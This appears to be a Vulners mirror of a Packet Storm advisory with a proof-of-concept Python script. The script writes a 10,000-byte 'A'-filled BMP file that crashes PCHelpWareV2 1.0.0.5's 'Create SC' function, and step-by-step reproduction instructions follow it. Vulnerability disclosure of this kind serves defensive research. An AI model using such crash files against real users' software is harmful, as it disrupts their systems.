Lucene search
K

PCHelpWare 2 1.0.0.5 SC Denial Of Service

🗓️ 15 Apr 2019 00:00:00Reported by Alejandra SanchezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

PCHelpWare 2 1.0.0.5 SC Denial Of Service vulnerabilit

Code
`# -*- coding: utf-8 -*-  
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)  
# Date: 15/04/2019  
# Author: Alejandra Sánchez  
# Vendor Homepage: https://www.uvnc.com/home.html  
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi  
# Version: 1.0.0.5  
# Tested on: Windows 10  
  
# Proof of Concept:  
# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"  
# 2.- Open PCHelpWareV2 Viewer  
# 3.- Go to Tools -> Create SC  
# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created  
# 5.- Click on button -> Create SC  
# 6.- Crashed  
  
buffer = "\x41" * 10000  
  
f = open ("exploit.bmp", "w")  
f.write(buffer)  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
34